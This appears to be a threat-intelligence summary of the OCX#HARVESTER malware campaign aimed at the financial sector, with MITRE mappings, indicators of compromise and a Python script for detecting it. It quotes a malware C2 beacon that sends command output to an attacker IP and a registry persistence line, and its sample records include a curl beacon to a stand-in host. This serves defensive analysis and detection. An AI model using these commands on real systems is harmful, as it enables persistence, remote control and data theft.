OCX#HARVESTER is a threat campaign tracked by Securonix Threat Labs that leverages the More_eggs malware suite to target financial-sector victims, with activity observed from late 2022 through early 2023, including shifts in C2 infrastructure. The campaign uses image-themed LNK lure files, LOLBins (ie4uinit.exe and msxsl.exe), heavily obfuscated JavaScript loaders (TerraLoader), and multiple OCX#HARVESTER DLL payloads to achieve persistence, C2 communication, and data exfiltration. #OCXHARVESTER #More_eggs #TerraLoader #GoldenChickens
Key points
- OCX#HARVESTER campaign tracked by Securonix Threat Labs; targets appear linked to financial sector and cryptocurrency activities.
- Phishing with malicious ZIP attachments containing LNK shortcuts disguised as images as the primary delivery method.
- Initial execution relies on an obfuscated CMD command line embedded in the shortcut file and on a LOLBin (ie4uinit.exe) to launch the next stage from %TMP%.
- Heavily obfuscated JavaScript loaders (TerraLoader) provide C2 functionality and persistence via registry and appdata paths.
- Multiple OCX#HARVESTER DLL payloads (Camera.OCX#, Bonet.OCX#, Tunner.OCX#) download/upload data and feature Cobalt Strike shellcode in some variants.
- Post-exploitation activity includes credential/data theft (SharpChrome/SharpDPAPI) and extensive command execution via WMI, curl, and scheduled persistence.
MITRE Techniques
- [T1566.001] Phishing – ‘phishing emails containing a malicious compressed zip file appears to be the primary delivery method.’
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – ‘The two image lures take the appearance of a general image icon… The obfuscated command line…’
- [T1218.005] System Binary Proxy Execution: Regsvr32 – ‘…Regsvr32.exe is then used to register the DLL payload.’
- [T1220] XSL Script Processing – ‘Msxsl.exe LOLBin’ to process and execute scripts; heavy obfuscation in JS loaders.
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – ‘Persistence: Establish a registry foothold: ActXobj1.RegWrite("HKCU\Environment\UserInitMprLogonScript", …)’
- [T1071.001] Web Protocols – ‘ConnectionLite.open("GET", "hxxp://95.179.186[.]167/Writer.php?deploy=" + CommandToRun, false);’
- [T1047] WMI – ‘Commands and other processes can also be executed using Windows Management Instrumentation (WMI) infrastructure.’
- [T1497.003] Long Sleeps – ‘typeperf.exe "\System\Processor Queue Length" -si {sleep time in seconds} -sc 1’
- [T1070.001] Execution through LOLBins (implicit via Ie4uinit.exe and msxsl.exe) – ‘LOLBin usage: ie4uinit.exe’ and ‘LOLBin usage: msxsl.exe’
- [T1059.001] Command and Scripting Interpreter: PowerShell – referenced in MITRE matrix; observed CMD/WMIC usage in practice (PowerShell logging recommended).
- [T1041] Exfiltration Over C2 Channel – implied by C2 data flows to remote servers and data staging in appdata paths.
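Added example, not code from the Securonix report: a small Python detection pass over constructed process-creation records that flags the command-line patterns listed above (LOLBin execution, regsvr32 from a user-writable path, the UserInitMprLogonScript foothold, the Writer.php?deploy= beacon, and typeperf used as a long sleep). The rule names, sample records and the `c2.invalid` host are assumptions made for the demo.

```python
import re

# Constructed process-creation records for the demo (pid, command line); not from the report.
SAMPLE_EVENTS = [
    (1001, r'cmd.exe /c cd %TMP% && ie4uinit.exe'),
    (1002, r'msxsl.exe C:\Users\u\AppData\Local\Temp\data.xml loader.xsl'),
    (1003, r'typeperf.exe "\System\Processor Queue Length" -si 600 -sc 1'),
    (1004, r'typeperf.exe "\System\Processor Queue Length" -si 5 -sc 1'),
    (1005, r'regsvr32.exe /s C:\Users\u\AppData\Roaming\Camera.ocx'),
    (1006, r'curl.exe http://c2.invalid/Writer.php?deploy=hostname'),
    (1007, r'notepad.exe C:\Users\u\notes.txt'),
]

# Command-line rules mirroring the TTPs listed above (rule names are ours).
RULES = [
    ("lolbin_ie4uinit", re.compile(r"\bie4uinit\.exe\b", re.I)),
    ("lolbin_msxsl", re.compile(r"\bmsxsl\.exe\b", re.I)),
    # regsvr32 registering a DLL/OCX from %TMP%, a Temp folder or AppData
    ("regsvr32_userwritable", re.compile(r"\bregsvr32(\.exe)?\b.*(%tmp%|\\temp\\|\\appdata\\)", re.I)),
    ("logon_script_persistence", re.compile(r"UserInitMprLogonScript", re.I)),
    ("c2_writer_php", re.compile(r"/Writer\.php\?deploy=", re.I)),
]

# typeperf abused as a sleep: flag only when the sample interval (-si) is long.
TYPEPERF = re.compile(r"\btypeperf(\.exe)?\b.*?-si\s+(\d+)\s+-sc\s+1\b", re.I)


def classify(cmdline, sleep_threshold=300):
    """Return the list of rule names a single command line triggers."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    m = TYPEPERF.search(cmdline)
    if m and int(m.group(2)) >= sleep_threshold:
        hits.append("typeperf_long_sleep")
    return hits


def scan(events):
    """Map pid -> triggered rule names for every event that triggers at least one rule."""
    findings = {}
    for pid, cmdline in events:
        hits = classify(cmdline)
        if hits:
            findings[pid] = hits
    return findings


if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, hits)
```

In production these patterns would be fed from Sysmon Event ID 1 or Windows 4688 command lines; a short typeperf interval is left unflagged to avoid alerting on ordinary performance sampling.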
Indicators of Compromise
- [IP Address] – Hosts serving robots.php: 95.179.201[.]171, 95.179.180[.]224, and 172.86.75[.]75
- [IP Address] – C2: /Writer.php: 95.179.186[.]167
- [IP Address] – C2: telemistry[.]net/get.php?id=xxxxxxx: 95.179.170[.]76
- [IP Address] – Host Tunner.OCX#HARVESTER: 193.149.187[.]170
- [IP Address] – C2 implant: port 1437: 193.149.185[.]229
- [Domain] – telemistry[.]net (DNS activity)
- [Domain] – ukmedia[.]store; ukmedia[.]store/static-directory/html.mp3
- [Domain] – windowsupdatebg.s.llnwi[.]net
- [File name] – screenshots-9201.jpg.zip; robots.php; ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt; QVB3WZXVQG6G8O7V.txt
- [SHA256] – 36bf06bde63af8cdd673444edf64a323195fe962b3256e0269cdd7a89a7e2ae1; 631f92c9147733acf3faa02586cd2a6cda673ec83c24252fccda1982cf3e96f6